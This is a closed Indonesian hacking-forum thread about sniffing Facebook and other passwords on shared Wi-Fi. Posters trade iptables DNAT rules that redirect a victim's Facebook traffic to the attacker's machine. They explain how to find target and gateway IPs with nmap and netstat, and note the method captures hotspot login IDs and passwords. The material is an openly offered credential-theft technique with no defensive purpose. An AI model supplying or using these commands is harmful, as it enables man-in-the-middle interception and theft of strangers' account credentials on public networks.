Thread Closed
[Share] Sniffing password FB dkk dengen script
(02-01-2012, 10:47 PM)junior.riau18 Wrote: om konspirasi
ane coba ganti sintak ip tables nya yang di script pake DNAT
jadinya kek gini
Code:
iptables -t nat -A PREROUTING –p tcp –d (ipfacebook) --dport 80 –j DNAT --to-destination (ipkita)
tapi g pengaruh,,
menurut om koecroet ada yang salah gak??

coba ini:
Code:
iptables -t nat -A PREROUTING -p tcp -i eth0 -d ipfacebook --dport 80 --sport 1024:65535 -j DNAT --to ipkita

(02-02-2012, 01:35 AM)konspirasi Wrote:
(02-01-2012, 10:47 PM)junior.riau18 Wrote: om konspirasi
ane coba ganti sintak ip tables nya yang di script pake DNAT
jadinya kek gini
Code:
iptables -t nat -A PREROUTING –p tcp –d (ipfacebook) --dport 80 –j DNAT --to-destination (ipkita)
tapi g pengaruh,,
menurut om koecroet ada yang salah gak??

coba ini:
Code:
iptables -t nat -A PREROUTING -p tcp -i eth0 -d ipfacebook --dport 80 --sport 1024:65535 -j DNAT --to ipkita
ok omss

tak coba dulu Smile

armitage ku gak bisa jalan.,hehehe

4. kalo berhasil akan keluar pertanyaan seperti dibawah ini:
Spoiler! :
[Image: snapshot23.png]


pengguna baru mao tanya ka..
itu yang di masukin IP sapa ?
cara ngeliat IP nya gimana ?
mohon bantuannya...TongueTongue

(02-07-2012, 10:50 AM)DENY Wrote: 4. kalo berhasil akan keluar pertanyaan seperti dibawah ini:
Spoiler! :
[Image: snapshot23.png]


pengguna baru mao tanya ka..
itu yang di masukin IP sapa ?
cara ngeliat IP nya gimana ?
mohon bantuannya...TongueTongue

ane jawab ya,
ip target korban (client), cara liatnya bisa pake nmap, autoscan dll. liat aja ip-ip yg ada selain ip laptopmu sendiri Tongue

ip router liatnya bisa pake netstat -nr, masukkan ip gateway

ane jawab ya,
ip target korban (client), cara liatnya bisa pake nmap, autoscan dll. liat aja ip-ip yg ada selain ip laptopmu sendiri Tongue

ip router liatnya bisa pake netstat -nr, masukkan ip gateway
[/quote]

makasih kaka...Big GrinBig Grin
sya tak cobain dulu....
low mentok ntar kesini lag..heheheh

waaa.... baik hati neh oom.... maw bagi² ilmunya...

report,,

sepertinya untuk sniff di wifi dengan mikrotik hotspot yang menggunakan login di web browser
sintak ini efektif ,,
Code:
iptables -t nat -A PREROUTING -p tcp -i eth0 -d ipfacebook --dport 80 --sport 1024:65535 -j DNAT --to ipkita
ketimbang sintak yang langsung redirect ke port 10000,,
soal nya abis login hotspot dah kena redirect,,

kalo sintak di atas kan ketika ke facebook aja di redirect,,
tapi nanti fix nya en kabarin lagi,,
masih ane check2 terus,,

ok CMIIW yah teman2
maklum pengguna baru,,masih belajar ngoprek sintak Smile
kalo pake wlan,,eth0 nya ganti wlan0 ajah hehe

wah apa bener gak bisa di bt 5??
saya coba dulu deh ...mana tau udah bisa awkawa Smile
<< back|track'ers newbee

(02-11-2012, 02:49 PM)fake666 Wrote: wah apa bener gak bisa di bt 5??
saya coba dulu deh ...mana tau udah bisa awkawa Smile

siapa bilang g bisa??

bisa kok cuma untuk sniff di mikrotik hotspot yang mesti login via browser baru bisa ngenet kurang efektif,,karena abis login udah di direct ke port 10000

jadi ya g dapat apa" selain id sama pas untuk login,,


Thread Closed


Users browsing this thread: 2 Guest(s)